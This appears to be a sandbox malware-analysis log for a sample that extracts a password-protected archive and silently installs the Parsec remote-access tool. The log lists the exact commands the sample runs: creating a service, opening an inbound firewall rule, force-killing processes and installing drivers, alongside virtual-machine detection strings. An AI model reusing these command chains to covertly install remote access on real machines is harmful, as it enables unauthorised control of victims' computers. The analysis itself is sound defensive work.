Source: uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A62000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000003.1956522073.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337367644.000001989086D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743067359.0000019890041000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3336997303.0000019890047000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576139520.000001989086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WindowsAzure Stack HCIHyper-V ServerWe were expecting an Os, Build and Service Pack field but we didn't get one
Source: wscript.exe, 00000029.00000003.2004424792.0000000003116000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: onecore\base\ngscb\tpmhli\lib\pcrs.cppAMDAtmelATMLBroadcomBRCMCiscoCSCOFlySliceFLYSGoogleGOOGHPEIBMInfineonIFXIntelINTCLenovoLENMicrochipMCHPMicrosoftMSFTNational SemiconductorNSM NationzNTZNuvoton TechnologyNTCQualcommQCOMFuzhou RockchipROCCSMSCST MicroelectronicsSTM SamsungSMSNSinosunSNSTexas InstrumentTXNVMWareVMWWinbondWECTPM_PT_FAMILY_INDICATORTPM_PT_LEVELTPM_PT_REVISIONTPM_PT_DAY_OF_YEARTPM_PT_YEARTPM_PT_MANUFACTURERTPM_PT_VENDOR_STRING_1TPM_PT_VENDOR_STRING_2TPM_PT_VENDOR_STRING_3TPM_PT_VENDOR_STRING_4TPM_PT_VENDOR_TPM_TYPETPM_PT_FIRMWARE_VERSION_1TPM_PT_FIRMWARE_VERSION_2TPM_PT_INPUT_BUFFERTPM_PT_HR_TRANSIENT_MINTPM_PT_HR_PERSISTENT_MINTPM_PT_HR_LOADED_MINTPM_PT_ACTIVE_SESSIONS_MAXTPM_PT_PCR_COUNTTPM_PT_PCR_SELECT_MINTPM_PT_CONTEXT_GAP_MAXTPM_PT_NV_COUNTERS_MAXTPM_PT_NV_INDEX_MAXTPM_PT_MEMORYTPM_PT_CLOCK_UPDATETPM_PT_CONTEXT_HASHTPM_PT_CONTEXT_SYMTPM_PT_CONTEXT_SYM_SIZETPM_PT_ORDERLY_COUNTTPM_PT_MAX_COMMAND_SIZETPM_PT_MAX_RESPONSE_SIZETPM_PT_MAX_DIGESTTPM_PT_MAX_OBJECT_CONTEXTTPM_PT_MAX_SESSION_CONTEXTTPM_PT_PS_FAMILY_INDICATORTPM_PT_PS_LEVELTPM_PT_PS_REVISIONTPM_PT_PS_DAY_OF_YEARTPM_PT_PS_YEARTPM_PT_SPLIT_MAXTPM_PT_TOTAL_COMMANDSTPM_PT_LIBRARY_COMMANDSTPM_PT_VENDOR_COMMANDSTPM_PT_NV_BUFFER_MAXTPM_PT_MODESTPM_PT_MAX_CAP_BUFFERTPM_PT_PERMANENTTPM_PT_STARTUP_CLEARTPM_PT_HR_NV_INDEXTPM_PT_HR_LOADEDTPM_PT_HR_LOADED_AVAILTPM_PT_HR_ACTIVETPM_PT_HR_ACTIVE_AVAILTPM_PT_HR_TRANSIENT_AVAILTPM_PT_HR_PERSISTENTTPM_PT_HR_PERSISTENT_AVAILTPM_PT_NV_COUNTERSTPM_PT_NV_COUNTERS_AVAILTPM_PT_ALGORITHM_SETTPM_PT_LOADED_CURVESTPM_PT_LOCKOUT_COUNTERTPM_PT_MAX_AUTH_FAILTPM_PT_LOCKOUT_INTERVALTPM_PT_LOCKOUT_RECOVERYTPM_PT_NV_WRITE_RECOVERYTPM_PT_AUDIT_COUNTER_0TPM_PT_AUDIT_COUNTER_1TPM_HT_PCRTPM_HT_NV_INDEXTPM_HT_HMAC_SESSIONTPM_HT_LOADED_SESSIONTPM_HT_POLICY_SESSIONTPM_HT_SAVED_SESSIONTPM_HT_PERMANENTTPM_HT_TRANSIENTTPM_HT_PERSISTENTTPM_RH_FIRSTTPM_RH_SRKTPM_RH_OWNERTPM_RH_REVOKETPM_RH_TRANSPORTTPM_RH_OPERATORTPM_RH_ADMINTPM_RH_EKTPM_RH_NULLTPM_RH_UNASSIGNEDTPM_RH_PWTPM_RH_LOCKOUTTPM_RH_ENDORSEMENTTPM_RH_PLATFORMTPM_RH_PLATFORM_NVTPM_RH_AUTH_00TPM_RH_AUTH_FFTPM_RH_LASTTPM_INTEL_PROP_INTC_FLAGSTPM_ALG_RSATPM_ALG_SHA1TPM_ALG_HMACTPM_ALG_AESTPM_ALG_MGF1TPM_ALG_KEYEDHASHTPM_ALG_XORTPM_ALG_SHA256TPM_ALG_SHA384TPM_ALG_SHA512TPM_ALG_NULLTPM_ALG_SM3_256TPM_ALG_SM4TPM_ALG_RSASSATPM_ALG_RSAESTPM_ALG_RSAPSSTPM_ALG_OAEPTPM_ALG_ECDSATPM_ALG_ECDHTPM_ALG_KDF1_SP800_108TPM_ALG_ECCTPM_ALG_SYMCIPHERTPM_ALG_SHA3_256TPM_ALG_SHA3_384TPM_ALG_SHA3_512TPM_ALG_CTRTPM_ALG_OFBTPM_ALG_CBCTPM_ALG_CFBTPM_ALG_ECBTPM2_NV_UndefineSpaceSpecialTPM2_EvictControlTPM2_HierarchyControlTPM2_NV_UndefineSpaceTPM2_ChangeEPSTPM2_ChangePPSTPM2_ClearTPM2_ClearControlTPM2_ClockSetTPM2_HierarchyChangeAuthTPM2_NV_DefineSpaceTPM2_PCR_AllocateTPM2_PCR_SetAuthPolicyTPM2_PP_CommandsTPM2_SetPrimaryPolicyTPM2_FieldUpgradeStartTPM2_ClockRateAdjustTPM2_CreatePrimaryTPM2_NV_GlobalWriteLockTPM2_GetCommandAuditDigestTPM2_NV_IncrementTPM2_NV_SetBitsTPM2_NV_ExtendTPM2_NV_WriteTPM2_NV_WriteLockTPM2_DictionaryAttackLockResetT
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeAPI call chain: ExitProcess graph end nodegraph_12-3589
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeAPI call chain: ExitProcess graph end node
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC0370C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00007FF7EC0370C8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00466550 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,fputs,fputs,5_2_00466550
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC030D20 GetProcessHeap,40_2_00007FF7EC030D20
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC036D74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00007FF7EC036D74
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC037274 SetUnhandledExceptionFilter,40_2_00007FF7EC037274
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC0370C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00007FF7EC0370C8
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02B0C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00007FF7EC02B0C4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C374A4 SetUnhandledExceptionFilter,49_2_00007FF763C374A4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C372FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00007FF763C372FC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C418AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00007FF763C418AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C37050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_00007FF763C37050
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BA6840 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,52_2_00007FF694BA6840
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BB10DC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00007FF694BB10DC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BA6AEC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00007FF694BA6AEC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BA6CD0 SetUnhandledExceptionFilter,52_2_00007FF694BA6CD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750D6840 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,72_2_00007FF6750D6840
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E10DC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_00007FF6750E10DC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750D6AEC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_00007FF6750D6AEC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750D6CD0 SetUnhandledExceptionFilter,72_2_00007FF6750D6CD0
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /SJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop ParsecJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete ParsecJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exeJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015c" "winsta0\default" "0000000000000174" "208" "c:\program files\parsec virtual usb adapter driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015c" "winsta0\default" "00000000000000f4" "208" "c:\program files\parsec virtual usb adapter driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015c" "winsta0\default" "0000000000000174" "208" "c:\program files\parsec virtual usb adapter driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015c" "winsta0\default" "00000000000000f4" "208" "c:\program files\parsec virtual usb adapter driver\parsecvirtualds"
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC022130 SHGetKnownFolderPath,CoTaskMemFree,RegisterServiceCtrlHandlerExW,SetServiceStatus,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,GetLastError,SetServiceStatus,SetServiceStatus,ConnectNamedPipe,GetLastError,GetNamedPipeClientProcessId,ProcessIdToSessionId,WTSGetActiveConsoleSessionId,OpenProcess,QueryFullProcessImageNameW,CloseHandle,OpenProcess,OpenProcessToken,SHGetKnownFolderPath,CoTaskMemFree,CloseHandle,CloseHandle,ReadFile,WriteFile,DisconnectNamedPipe,EnterCriticalSection,GetExitCodeProcess,CloseHandle,LeaveCriticalSection,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,SendSAS,RegCloseKey,OpenProcess,WriteFile,DisconnectNamedPipe,CloseHandle,CloseHandle,SetServiceStatus,40_2_00007FF7EC022130
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0046E460 cpuid 5_2_0046E460
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,49_2_00007FF763C5543C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,49_2_00007FF763C5D3B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,49_2_00007FF763C5D318
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,49_2_00007FF763C5D248
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,49_2_00007FF763C5D800
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,49_2_00007FF763C5D750
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,49_2_00007FF763C5D5F8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,49_2_00007FF763C5D934
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,49_2_00007FF763C54FBC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,49_2_00007FF763C5CEEC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,52_2_00007FF694BCC5F8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,52_2_00007FF694BC46BC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,52_2_00007FF694BCC690
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,52_2_00007FF694BCC8D8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,52_2_00007FF694BCC1CC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,52_2_00007FF694BCC528
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,52_2_00007FF694BCCA30
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,52_2_00007FF694BCCAE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,52_2_00007FF694BCCC14
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,52_2_00007FF694BC4B3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,72_2_00007FF6750FC690
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,72_2_00007FF6750F46BC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,72_2_00007FF6750FC5F8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,72_2_00007FF6750FC8D8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,72_2_00007FF6750FC1CC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,72_2_00007FF6750FC528
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,72_2_00007FF6750FCAE0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,72_2_00007FF6750FCA30
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,72_2_00007FF6750F4B3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,72_2_00007FF6750FCC14
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C04DD0 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiBuildDriverInfoList,SetupDiEnumDriverInfoW,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,49_2_00007FF763C04DD0
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.cat VolumeInformation
Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\runonce.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC022130 SHGetKnownFolderPath,CoTaskMemFree,RegisterServiceCtrlHandlerExW,SetServiceStatus,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,GetLastError,SetServiceStatus,SetServiceStatus,ConnectNamedPipe,GetLastError,GetNamedPipeClientProcessId,ProcessIdToSessionId,WTSGetActiveConsoleSessionId,OpenProcess,QueryFullProcessImageNameW,CloseHandle,OpenProcess,OpenProcessToken,SHGetKnownFolderPath,CoTaskMemFree,CloseHandle,CloseHandle,ReadFile,WriteFile,DisconnectNamedPipe,EnterCriticalSection,GetExitCodeProcess,CloseHandle,LeaveCriticalSection,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,SendSAS,RegCloseKey,OpenProcess,WriteFile,DisconnectNamedPipe,CloseHandle,CloseHandle,SetServiceStatus,40_2_00007FF7EC022130
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004587AC free,free,free,free,free,free,free,_CxxThrowException,_CxxThrowException,free,free,free,free,free,free,free,free,free,free,memmove,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetSystemTimeAsFileTime,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memmove,free,free,wcscmp,free,free,_CxxThrowException,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memset,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetLastError,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetProcAddress,free,free,memset,memset,memset,free,free,free,free,free,free,free,free,GetProcAddress,GetLastError,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memset,memset,memset,free,free,free,free,free,free,free,free,free,free,free,CompareFileTime,CompareFileTime,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,5_2_004587AC
